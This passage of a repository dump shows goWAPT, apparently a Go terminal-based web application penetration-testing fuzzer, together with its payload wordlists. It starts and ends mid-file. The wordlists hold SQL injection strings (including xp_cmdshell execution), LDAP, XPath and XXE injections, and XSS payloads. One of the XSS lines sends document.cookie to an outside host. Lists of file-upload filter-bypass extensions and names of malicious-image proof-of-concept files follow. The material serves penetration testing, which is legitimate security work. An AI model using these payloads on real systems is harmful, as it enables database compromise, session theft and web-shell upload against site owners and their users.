is written in Go (Golang) so it's extremely fast and relaiable\n\n"+ 37 | "For info and bug send mail to danielelinguaglossa@gmail.com") 38 | drawFooter("^7[^1Q^7] Quit ^7[^1B^7] Back") 39 | } else { 40 | drawCenterAlign(termbox.ColorRed, termbox.ColorDefault, "Please resize screen") 41 | } 42 | termbox.Flush() 43 | } 44 | 45 | func infoQuit(int) interface{} { 46 | cleanAndExit() 47 | return nil 48 | } 49 | 50 | func infoBack(int) interface{} { 51 | return true 52 | } 53 | 54 | func infoInitHotkeys() { 55 | addCallbackMenu("info", int('q'), callbackMethod(infoQuit)) 56 | addCallbackMenu("info", 
int('Q'), callbackMethod(infoQuit)) 57 | addCallbackMenu("info", int('b'), callbackMethod(infoBack)) 58 | addCallbackMenu("info", int('B'), callbackMethod(infoBack)) 59 | } 60 | 61 | func infoMenu() { 62 | infoInitHotkeys() 63 | infoInitTerminal() 64 | loop: 65 | for { 66 | event := termbox.PollEvent() 67 | ret := infoHandleEvents(event) 68 | if ret != nil { 69 | break loop 70 | } 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /src/mainmenu.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/nsf/termbox-go" 5 | ) 6 | 7 | func handleEvents(ev termbox.Event, cfg Configuration) { 8 | switch ev.Type { 9 | case termbox.EventError: 10 | panic(ev.Err) 11 | case termbox.EventKey: 12 | if haveCallbackDefined("main", int(ev.Ch)) { 13 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 14 | checkCallback("main", int(ev.Ch)) 15 | initTerminal(cfg) 16 | termbox.Flush() 17 | } 18 | case termbox.EventResize: 19 | initTerminal(cfg) 20 | default: 21 | initTerminal(cfg) 22 | } 23 | } 24 | 25 | func initTerminal(cfg Configuration) { 26 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 27 | if _, _, correctSize := checkSize(); correctSize { 28 | drawCenterHorizontal(2, termbox.ColorDefault, "^1CONFIGURATION") 29 | 30 | drawMultiColor(1, 5, "^4URL ^6: ^7%s", termbox.ColorDefault, formatConfigOption(cfg.url)) 31 | drawMultiColor(1, 6, "^4SSL ^6: ^7%v", termbox.ColorDefault, cfg.ssl) 32 | drawMultiColor(1, 7, "^4Cookies ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.cookies)) 33 | drawMultiColor(1, 8, "^4Encoders ^6: ^7%v", termbox.ColorDefault, cfg.encoders) 34 | drawMultiColor(1, 9, "^4Post Data ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.postdata)) 35 | drawMultiColor(1, 10, "^4Template ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.template)) 36 | drawMultiColor(1, 11, "^4Wordlist ^6: ^7%v", 
termbox.ColorDefault, formatConfigOption(cfg.wordlist)) 37 | drawMultiColor(1, 12, "^4Use fuzzer ^6: ^7%v", termbox.ColorDefault, cfg.usefuzzer) 38 | drawMultiColor(1, 13, "^4Threads ^6: ^7%v", termbox.ColorDefault, cfg.threads) 39 | drawMultiColor(1, 14, "^4Filter ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.filter)) 40 | drawHeader("^7Go Web Application Penetration Test made with ^1❤ ^7by DZONERZY") 41 | drawFooter("^7[^1Q^7] Quit ^7[^1S^7] Start Attack ^7[^1I^7] Info") 42 | } else { 43 | drawCenterAlign(termbox.ColorRed, termbox.ColorDefault, "Please resize screen") 44 | } 45 | termbox.Flush() 46 | } 47 | 48 | func quit(int) interface{} { 49 | cleanAndExit() 50 | return nil 51 | } 52 | 53 | func info(int) interface{} { 54 | infoMenu() 55 | return nil 56 | } 57 | 58 | func startFuzz(int) interface{} { 59 | started = true 60 | go startFuzzEngine(&config, &results) 61 | fuzzMenu() 62 | return nil 63 | } 64 | 65 | func initHotkeys() { 66 | addCallbackMenu("main", int('q'), callbackMethod(quit)) 67 | addCallbackMenu("main", int('Q'), callbackMethod(quit)) 68 | addCallbackMenu("main", int('i'), callbackMethod(info)) 69 | addCallbackMenu("main", int('I'), callbackMethod(info)) 70 | addCallbackMenu("main", int('S'), callbackMethod(startFuzz)) 71 | addCallbackMenu("main", int('s'), callbackMethod(startFuzz)) 72 | } 73 | 74 | func mainMenu(cfg Configuration) { 75 | initHotkeys() 76 | initPrints() 77 | initTerminal(cfg) 78 | for { 79 | event := termbox.PollEvent() 80 | handleEvents(event, cfg) 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /src/scanengine.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net/http" 5 | ) 6 | 7 | var stopScannerEngine chan bool 8 | var stopScanEngine chan bool 9 | var endScanDispose chan bool 10 | var stopPlugin chan bool 11 | var scanFinishedChan chan bool 12 | var scanStopPlugin chan bool 13 | var 
testChannel chan []TestResult 14 | var scanStoppedViaStop bool = false 15 | var scanEndDispose chan bool 16 | 17 | func startScanEngine(base_request *http.Request, plugins *[]ScannerPlugin) { 18 | stopScannerEngine = make(chan bool) 19 | stopScanEngine = make(chan bool) 20 | go runScanEngine(base_request, plugins) 21 | for { 22 | select { 23 | case res := <-stopScannerEngine: 24 | if res == true { 25 | stopScanEngine <- true 26 | return 27 | } 28 | } 29 | } 30 | } 31 | 32 | func scanDispose(res *[]TestResult, ch chan []TestResult, until int, finish chan bool, end chan bool) { 33 | for i := 1; i <= until; i++ { 34 | select { 35 | case r := <-ch: 36 | percentage = (100 * i) / until 37 | for _, element := range r { 38 | *res = append(*res, element) 39 | videoUpdateChan <- true 40 | } 41 | videoUpdateChan <- true 42 | case k := <-end: 43 | if k == true { 44 | finish <- true 45 | return 46 | } 47 | } 48 | } 49 | finish <- true 50 | return 51 | } 52 | 53 | func scanWaitTillEnd(finished chan bool) { 54 | endLoop: 55 | for { 56 | select { 57 | case r := <-finished: 58 | if r == true { 59 | break endLoop 60 | } 61 | } 62 | } 63 | } 64 | 65 | func doPlugin(ch chan []TestResult, stopch chan bool, base_request *http.Request, plugin ScannerPlugin) { 66 | var done bool = false 67 | for !done { 68 | select { 69 | case s := <-stopch: 70 | if s == true { 71 | return 72 | } 73 | default: 74 | r := plugin.entryPoint(base_request) 75 | val, _ := r.Export() 76 | switch v := val.(type) { 77 | case []TestResult: 78 | ch <- v 79 | default: 80 | ch <- []TestResult{} 81 | } 82 | done = true 83 | } 84 | } 85 | } 86 | 87 | func runScanEngine(base_request *http.Request, plugins *[]ScannerPlugin) { 88 | testChannel = make(chan []TestResult) 89 | scanFinishedChan = make(chan bool) 90 | scanStopPlugin = make(chan bool) 91 | scanEndDispose = make(chan bool) 92 | videoUpdateChan = make(chan bool) 93 | max := len(*plugins) 94 | go scanDispose(&ScannerResults, testChannel, max, scanFinishedChan, 
scanEndDispose) 95 | scanEngineLoop: 96 | for _, plugin := range *plugins { 97 | select { 98 | case r := <-stopEngine: 99 | if r == true { 100 | scanStoppedViaStop = true 101 | scanEndDispose <- true 102 | break scanEngineLoop 103 | } 104 | default: 105 | r := plugin.entryPoint(base_request) 106 | val, _ := r.Export() 107 | switch v := val.(type) { 108 | case []TestResult: 109 | testChannel <- v 110 | default: 111 | testChannel <- []TestResult{} 112 | } 113 | } 114 | } 115 | scanWaitTillEnd(scanFinishedChan) 116 | if !scanStoppedViaStop { 117 | stopScannerEngine <- true 118 | } 119 | started = false 120 | percentage = (100 * max) / max 121 | videoUpdateChan <- true 122 | return 123 | } 124 | -------------------------------------------------------------------------------- /src/utils.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "io/ioutil" 5 | "net/http" 6 | "net/http/httputil" 7 | "os" 8 | "strconv" 9 | "strings" 10 | 11 | "github.com/nsf/termbox-go" 12 | ) 13 | 14 | func checkSize() (int, int, bool) { 15 | width, height := termbox.Size() 16 | if (width < 105) || (height < 23) { 17 | return width, height, false 18 | } 19 | return width, height, true 20 | } 21 | 22 | func cleanAndExit() { 23 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 24 | termbox.Close() 25 | os.Exit(0) 26 | } 27 | 28 | type callbackMethod func(int) interface{} 29 | 30 | type Callback struct { 31 | cmd int 32 | action callbackMethod 33 | } 34 | 35 | var callbacks = map[string][]Callback{} 36 | 37 | func addCallbackMenu(menuName string, charcmd int, callback callbackMethod) { 38 | callbacks[menuName] = append(callbacks[menuName], Callback{cmd: charcmd, action: callback}) 39 | } 40 | 41 | func haveCallbackDefined(menuName string, charcmd int) bool { 42 | for _, callback := range callbacks[menuName] { 43 | if callback.cmd == charcmd || callback.cmd == CALLBACK_EVERY_KEY { 44 | return true 45 | } 46 | } 47 | 
return false 48 | } 49 | 50 | func checkCallback(menuName string, cmd int) interface{} { 51 | for _, callback := range callbacks[menuName] { 52 | if callback.cmd == cmd || callback.cmd == CALLBACK_EVERY_KEY { 53 | return callback.action(cmd) 54 | } 55 | } 56 | return nil 57 | } 58 | 59 | func formatConfigOption(s string) string { 60 | if s == "" { 61 | return "" 62 | } else { 63 | return s 64 | } 65 | } 66 | 67 | func resetCallbacks(menuName string) { 68 | callbacks[menuName] = []Callback{} 69 | } 70 | 71 | func splitToFill(s string, n int) []string { 72 | var pieces []string 73 | var tmp string 74 | var count int = 0 75 | for _, element := range s { 76 | count++ 77 | tmp += string(element) 78 | if strings.Contains(tmp, "\n") { 79 | count = 0 80 | pieces = append(pieces, tmp) 81 | tmp = "" 82 | } 83 | if count == n { 84 | count = 0 85 | pieces = append(pieces, tmp) 86 | tmp = "" 87 | } 88 | } 89 | pieces = append(pieces, tmp) 90 | return pieces 91 | } 92 | 93 | func response2String(response *http.Response) []byte { 94 | var reqBodyBytes []byte 95 | respBodyBytes, _ := ioutil.ReadAll(response.Body) 96 | cl, _ := strconv.Atoi(response.Request.Header.Get("Content-Length")) 97 | if cl > 0 { 98 | reqBodyBytes, _ = ioutil.ReadAll(response.Request.Body) 99 | } else { 100 | reqBodyBytes = []byte{} 101 | } 102 | s_req, _ := httputil.DumpRequest(response.Request, true) 103 | s_res, _ := httputil.DumpResponse(response, false) 104 | var full []byte 105 | full = append(full, s_req...) 106 | full = append(full, reqBodyBytes...) 107 | full = append(full, []byte{0x0a, 0x0a, 0x0a}...) 108 | full = append(full, s_res...) 109 | full = append(full, respBodyBytes...) 
110 | return full 111 | } 112 | -------------------------------------------------------------------------------- /wordlist/Injections/SQL.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | # 4 | - 5 | -- 6 | '%20-- 7 | --'; 8 | '%20; 9 | =%20' 10 | =%20; 11 | =%20-- 12 | \x23 13 | \x27 14 | \x3D%20\x3B' 15 | \x3D%20\x27 16 | \x27\x4F\x52 SELECT * 17 | \x27\x6F\x72 SELECT * 18 | 'or%20select * 19 | admin'-- 20 | <>"'%;)(&+ 21 | '%20or%20''=' 22 | '%20or%20'x'='x 23 | "%20or%20"x"="x 24 | ')%20or%20('x'='x 25 | 0 or 1=1 26 | ' or 0=0 -- 27 | " or 0=0 -- 28 | or 0=0 -- 29 | ' or 0=0 # 30 | " or 0=0 # 31 | or 0=0 # 32 | ' or 1=1-- 33 | " or 1=1-- 34 | ' or '1'='1'-- 35 | "' or 1 --'" 36 | or 1=1-- 37 | or%201=1 38 | or%201=1 -- 39 | ' or 1=1 or ''=' 40 | " or 1=1 or ""=" 41 | ' or a=a-- 42 | " or "a"="a 43 | ') or ('a'='a 44 | ") or ("a"="a 45 | hi" or "a"="a 46 | hi" or 1=1 -- 47 | hi' or 1=1 -- 48 | hi' or 'a'='a 49 | hi') or ('a'='a 50 | hi") or ("a"="a 51 | 'hi' or 'x'='x'; 52 | @variable 53 | ,@variable 54 | PRINT 55 | PRINT @@variable 56 | select 57 | insert 58 | as 59 | or 60 | procedure 61 | limit 62 | order by 63 | asc 64 | desc 65 | delete 66 | update 67 | distinct 68 | having 69 | truncate 70 | replace 71 | like 72 | handler 73 | bfilename 74 | ' or username like '% 75 | ' or uname like '% 76 | ' or userid like '% 77 | ' or uid like '% 78 | ' or user like '% 79 | exec xp 80 | exec sp 81 | '; exec master..xp_cmdshell 82 | '; exec xp_regread 83 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 84 | --sp_password 85 | \x27UNION SELECT 86 | ' UNION SELECT 87 | ' UNION ALL SELECT 88 | ' or (EXISTS) 89 | ' (select top 1 90 | '||UTL_HTTP.REQUEST 91 | 1;SELECT%20* 92 | to_timestamp_tz 93 | tz_offset 94 | <>"'%;)(&+ 95 | '%20or%201=1 96 | %27%20or%201=1 97 | %20$(sleep%2050) 98 | %20'sleep%2050' 99 | char%4039%41%2b%40SELECT 100 | '%20OR 101 | 'sqlattempt1 102 | (sqlattempt2) 103 | | 104 | %7C 105 | *| 106 | 
%2A%7C 107 | *(|(mail=*)) 108 | %2A%28%7C%28mail%3D%2A%29%29 109 | *(|(objectclass=*)) 110 | %2A%28%7C%28objectclass%3D%2A%29%29 111 | ( 112 | %28 113 | ) 114 | %29 115 | & 116 | %26 117 | ! 118 | %21 119 | ' or 1=1 or ''=' 120 | ' or ''=' 121 | x' or 1=1 or 'x'='y 122 | / 123 | // 124 | //* 125 | */* 126 | -------------------------------------------------------------------------------- /wordlist/Injections/XML.txt: -------------------------------------------------------------------------------- 1 | count(/child::node()) 2 | x' or name()='username' or 'x'='y 3 | ','')); phpinfo(); exit;/* 4 | var n=0;while(true){n++;}]]> 5 | SCRIPT]]>alert('XSS');/SCRIPT]]> 6 | SCRIPT]]>alert('XSS');/SCRIPT]]> 7 | 8 | ]>&xxe; 9 | ]>&xxe; 10 | ]>&xxe; 11 | ]>&xxe; 12 | ]]> 13 | <IMG SRC="javascript:alert('XSS')"> 14 | 15 | XSS 16 | -------------------------------------------------------------------------------- /wordlist/Injections/XSS.txt: -------------------------------------------------------------------------------- 1 | "> 3 | < 4 | 5 | '> 6 | '> 7 | \";alert('XSS');// 8 | %3cscript%3ealert("WXSS");%3c/script%3e 9 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e 10 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E 11 | <script>alert(document.cookie); 12 | <script>alert(document.cookie);<script>alert 13 | 14 | 15 | 16 | 18 | 19 | 20 | 21 | "> 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E 36 | "> 37 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E 38 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} 39 | '';!--"=&{()} 40 | -------------------------------------------------------------------------------- /wordlist/Injections/bad_chars.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/Injections/bad_chars.txt -------------------------------------------------------------------------------- /wordlist/attack/all-attacks/all-attacks-xplatform.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | "><"test@address.com 24 | a"b(c)d,e:f;gi[j\k]l@example.com 25 | this is"not\allowed@example.com 26 | notallowed@example.com 27 | notallowed@example.com 28 | -------------------------------------------------------------------------------- /wordlist/attack/email/valid-email-addresses.txt: -------------------------------------------------------------------------------- 1 | email@eaddress.com 2 | firstname.lastname@address.com 3 | email@subdomain.address.com 4 | firstname+lastname@address.com 5 | name@129.129.129.129 6 | name@[129.129.129.129] 7 | 0123456789@address.com 8 | email@address-one.com 9 | email@address.name 10 | email@address.co.jp 11 | firstname-lastname@address.com 12 | much."more\ unusual"@address.com 13 | very.unusual."@".unusual.com@address.com 14 | very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com 15 | abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com 16 | {jacco'vantuijl}@address.server 17 | "Jacco\@test"@address.com 18 | "Jacco van Tuijl"@address.com 19 | "Jacco\\test"@address.com 20 | "Jacco@test"@address.com 21 | Jacco/van=Tuijl@address.com 22 | \$A12345@address.com 23 | !def!abc%dfg@address.com 24 | _jacco@address.com 25 | a.long.email.address.test@dept.address.com 26 | "jacco.vantuijl.@.address.com"@address.com 27 | jacco@mailserver1 28 | #!$%&'*+-/=?^_`{}|~@address.org 29 | "()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org 30 | " "@address.org 31 | 
üñîçøðé@address.com 32 | address@üñîçøðé.com 33 | üñîçøðé@üñîçøðé.com -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-asp.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | asa 4 | aSP 5 | aSpx 6 | aSa 7 | asp%20%20%20 8 | aspx%20%20%20 9 | asa%20%20%20 10 | aSP%20%20%20 11 | aSpx%20%20%20 12 | aSa%20%20%20 13 | asp...... 14 | aspx...... 15 | asa...... 16 | aSP...... 17 | aSpx...... 18 | aSa...... 19 | asp%20%20%20...%20.%20.. 20 | aspx%20%20%20...%20.%20.. 21 | asa%20%20%20...%20.%20.. 22 | aSP%20%20%20...%20.%20.. 23 | aSpx%20%20%20...%20.%20.. 24 | aSa%20%20%20...%20.%20.. 25 | asp%00 26 | aspx%00 27 | asa%00 28 | aSp%00 29 | aSpx%00 30 | aSa%00 31 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-coldfusion.txt: -------------------------------------------------------------------------------- 1 | cfm 2 | cfml 3 | cfc 4 | dbm 5 | cFm 6 | cFml 7 | cFc 8 | dBm 9 | cfm%20%20%20 10 | cfml%20%20%20 11 | cfc%20%20%20 12 | dbm%20%20%20 13 | cFm%20%20%20 14 | cFml%20%20%20 15 | cFc%20%20%20 16 | dBm%20%20%20 17 | cfm...... 18 | cfml...... 19 | cfc....... 20 | dbm...... 21 | cFm...... 22 | cFml...... 23 | cFc...... 24 | dBm...... 25 | cfm%20%20%20...%20.%20.. 26 | cfml%20%20%20...%20.%20.. 27 | cfc%20%20%20...%20.%20.. 28 | dbm%20%20%20...%20.%20.. 29 | cFm%20%20%20...%20.%20.. 30 | cFml%20%20%20...%20.%20.. 31 | cFc%20%20%20...%20.%20.. 32 | dBm%20%20%20...%20.%20.. 
33 | cfm%00 34 | cfml%00 35 | cfc%00 36 | dbm%00 37 | cFm%00 38 | cFml%00 39 | cFc%00 40 | dBm%00 41 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-jsp.txt: -------------------------------------------------------------------------------- 1 | jsp 2 | jspx 3 | jsw 4 | jsv 5 | jspf 6 | jSp 7 | jSpx 8 | jSw 9 | jSv 10 | jSpf 11 | jSp%00 12 | jSp%20%20%20 13 | jSp%20%20%20...%20.%20..a 14 | jSp...... 15 | jSpf%00 16 | jSpf%20%20%20 17 | jSpf%20%20%20...%20.%20..a 18 | jSpf...... 19 | jSpx%00 20 | jSpx%20%20%20 21 | jSpx%20%20%20...%20.%20..a 22 | jSpx...... 23 | jSv%00 24 | jSv%20%20%20 25 | jSv%20%20%20...%20.%20..a 26 | jSv...... 27 | jSw%00 28 | jSw%20%20%20 29 | jSw%20%20%20...%20.%20..a 30 | jSw...... 31 | jsp%00 32 | jsp%20%20%20 33 | jsp%20%20%20...%20.%20..a 34 | jsp...... 35 | jspf%00 36 | jspf%20%20%20 37 | jspf%20%20%20...%20.%20..a 38 | jspf...... 39 | jspx%00 40 | jspx%20%20%20 41 | jspx%20%20%20...%20.%20..a 42 | jspx...... 43 | jsv%00 44 | jsv%20%20%20 45 | jsv%20%20%20...%20.%20..a 46 | jsv...... 47 | jsw%00 48 | jsw%20%20%20 49 | jsw%20%20%20...%20.%20..a 50 | jsw...... 51 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-perl.txt: -------------------------------------------------------------------------------- 1 | # .pm .lib cannot be called directly, must be called as modules 2 | pl 3 | pm 4 | cgi 5 | pL 6 | pM 7 | cGi 8 | lib 9 | lIb 10 | cGi%00 11 | cGi%20%20%20 12 | cGi...... 13 | cgi%00 14 | cgi%20%20%20 15 | cgi...... 16 | lIb%00 17 | lIb%20%20%20 18 | lIb...... 19 | lib%00 20 | lib%20%20%20 21 | lib...... 22 | pL%00 23 | pL%20%20%20 24 | pL...... 25 | pM%00 26 | pM%20%20%20 27 | pM...... 28 | pl%00 29 | pl%20%20%20 30 | pl...... 31 | pm%00 32 | pm%20%20%20 33 | pm...... 
34 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-php.txt: -------------------------------------------------------------------------------- 1 | phtml 2 | php 3 | php3 4 | php4 5 | php5 6 | inc 7 | pHtml 8 | pHp 9 | pHp3 10 | pHp4 11 | pHp5 12 | iNc 13 | iNc%00 14 | iNc%20%20%20 15 | iNc%20%20%20...%20.%20.. 16 | iNc...... 17 | inc%00 18 | inc%20%20%20 19 | inc%20%20%20...%20.%20.. 20 | inc...... 21 | pHp%00 22 | pHp%20%20%20 23 | pHp%20%20%20...%20.%20.. 24 | pHp...... 25 | pHp3%00 26 | pHp3%20%20%20 27 | pHp3%20%20%20...%20.%20.. 28 | pHp3...... 29 | pHp4%00 30 | pHp4%20%20%20 31 | pHp4%20%20%20...%20.%20.. 32 | pHp4...... 33 | pHp5%00 34 | pHp5%20%20%20 35 | pHp5%20%20%20...%20.%20.. 36 | pHp5...... 37 | pHtml%00 38 | pHtml%20%20%20 39 | pHtml%20%20%20...%20.%20.. 40 | pHtml...... 41 | php%00 42 | php%20%20%20 43 | php%20%20%20...%20.%20.. 44 | php...... 45 | php3%00 46 | php3%20%20%20 47 | php3%20%20%20...%20.%20.. 48 | php3...... 49 | php4%00 50 | php4%20%20%20 51 | php4%20%20%20...%20.%20.. 52 | php4...... 53 | php5%00 54 | php5%20%20%20 55 | php5%20%20%20...%20.%20.. 56 | php5...... 57 | phtml%00 58 | phtml%20%20%20 59 | phtml%20%20%20...%20.%20.. 60 | phtml...... 
61 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt: -------------------------------------------------------------------------------- 1 | templates_compiled 2 | templates_c 3 | templates 4 | temporary 5 | images 6 | cache 7 | temp 8 | files 9 | tmp 10 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}.{EXT} 3 | {ASPSCRIPT}; 4 | {ASPSCRIPT};.{EXT} 5 | {ASPSCRIPT}%00 6 | {ASPSCRIPT}%00.{EXT} 7 | {ASPSCRIPT}::data%00. 8 | {ASPSCRIPT}::data%00.{EXT} 9 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}; 3 | {ASPSCRIPT};.jpg 4 | {ASPSCRIPT};.pdf 5 | {ASPSCRIPT};.html 6 | {ASPSCRIPT};.htm 7 | {ASPSCRIPT};.txt 8 | {ASPSCRIPT};.xyz 9 | {ASPSCRIPT};.zip 10 | {ASPSCRIPT};.tgz 11 | {ASPSCRIPT};.doc 12 | {ASPSCRIPT};.docx 13 | {ASPSCRIPT};.xls 14 | {ASPSCRIPT};.xlsx 15 | {ASPSCRIPT}%00.jpg 16 | {ASPSCRIPT}%00.pdf 17 | {ASPSCRIPT}%00.html 18 | {ASPSCRIPT}%00.txt 19 | {ASPSCRIPT}%00.xyz 20 | {ASPSCRIPT}%00.tgz 21 | {ASPSCRIPT}%00.zip 22 | {ASPSCRIPT}%00.doc 23 | {ASPSCRIPT}%00.docx 24 | {ASPSCRIPT}%00 25 | {ASPSCRIPT}::data%00.jpg 26 | {ASPSCRIPT}::data%00.pdf 27 | {ASPSCRIPT}::data%00.html 28 | {ASPSCRIPT}::data%00.txt 29 | {ASPSCRIPT}::data%00.zip 30 | {ASPSCRIPT}::data%00.doc 31 | {ASPSCRIPT}::data%00.xls 32 | {ASPSCRIPT}%00%20%20%20 33 | {ASPSCRIPT}%00%20%20%20...%20.%20.. 34 | {ASPSCRIPT}%00...... 35 | {ASPSCRIPT}%20%20%20 36 | {ASPSCRIPT}%20%20%20...%20.%20.. 37 | {ASPSCRIPT}...... 
38 | {ASPSCRIPT}::data%00%%20%20%20 39 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20.. 40 | {ASPSCRIPT}::data%00%...... 41 | {ASPSCRIPT}%00%20%20%20;.jpg 42 | {ASPSCRIPT}%00%20%20%20;.doc 43 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg 44 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc 45 | {ASPSCRIPT}%00......;.jpg 46 | {ASPSCRIPT}%00......;.doc 47 | {ASPSCRIPT}%20%20%20;.jpg 48 | {ASPSCRIPT}%20%20%20;.doc 49 | {ASPSCRIPT}%20%20%20...%20.%20..;.jpg 50 | {ASPSCRIPT}%20%20%20...%20.%20..;.doc 51 | {ASPSCRIPT}......;.jpg 52 | {ASPSCRIPT}......;.doc 53 | {ASPSCRIPT}::data%00%%20%20%20;.jpg 54 | {ASPSCRIPT}::data%00%%20%20%20;.doc 55 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg 56 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc 57 | {ASPSCRIPT}::data%00%......;.jpg 58 | {ASPSCRIPT}::data%00%......;.doc 59 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-ms-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php::$DATA 5 | {PHPSCRIPT}.php.php.rar 6 | {PHPSCRIPT}.php.rar 7 | {PHPSCRIPT}::$DATA 8 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt: -------------------------------------------------------------------------------- 1 | %00index.html 2 | ;index.html 3 | %00 4 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php.php.rar 5 | {PHPSCRIPT}.php.rar 6 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filenames-linux.txt: 
-------------------------------------------------------------------------------- 1 | / 2 | 3 | \0 4 | /dev/null 5 | /dev/null/foo 6 | . 7 | .. -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filenames-microsoft.txt: -------------------------------------------------------------------------------- 1 | A: 2 | ZZ: 3 | CON 4 | PRN 5 | AUX 6 | CLOCK$ 7 | NUL 8 | COM1 9 | COM2 10 | COM3 11 | COM4 12 | COM5 13 | COM6 14 | COM7 15 | COM8 16 | COM9 17 | LPT1 18 | LPT2 19 | LPT3 20 | LPT4 21 | LPT5 22 | LPT6 23 | LPT7 24 | LPT8 25 | LPT9 26 | * 27 | " 28 | [ 29 | ] 30 | : 31 | | 32 | = 33 | , 34 | CON.{EXT} 35 | PRN.{EXT} 36 | AUX.{EXT} 37 | CLOCK$.{EXT} 38 | NUL.{EXT} 39 | COM1.{EXT} 40 | COM2.{EXT} 41 | COM3.{EXT} 42 | COM4.{EXT} 43 | COM5.{EXT} 44 | COM6.{EXT} 45 | COM7.{EXT} 46 | COM8.{EXT} 47 | COM9.{EXT} 48 | LPT1.{EXT} 49 | LPT2.{EXT} 50 | LPT3.{EXT} 51 | LPT4.{EXT} 52 | LPT5.{EXT} 53 | LPT6.{EXT} 54 | LPT7.{EXT} 55 | LPT8.{EXT} 56 | LPT9.{EXT} 57 | *.{EXT} 58 | ".{EXT} 59 | [.{EXT} 60 | ].{EXT} 61 | :.{EXT} 62 | |.{EXT} 63 | =.{EXT} 64 | ,.{EXT} 65 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filesystem-chars-microsoft.txt: -------------------------------------------------------------------------------- 1 | * 2 | . 3 | " 4 | / 5 | \ 6 | [ 7 | ] 8 | : 9 | ; 10 | | 11 | = 12 | , 13 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filesystem-chars-osx.txt: -------------------------------------------------------------------------------- 1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 
2 | # fuzz these into a filename during upload attempts 3 | : 4 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_img_phpinfo-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_img_phpinfo-LF-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | 3 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg: -------------------------------------------------------------------------------- 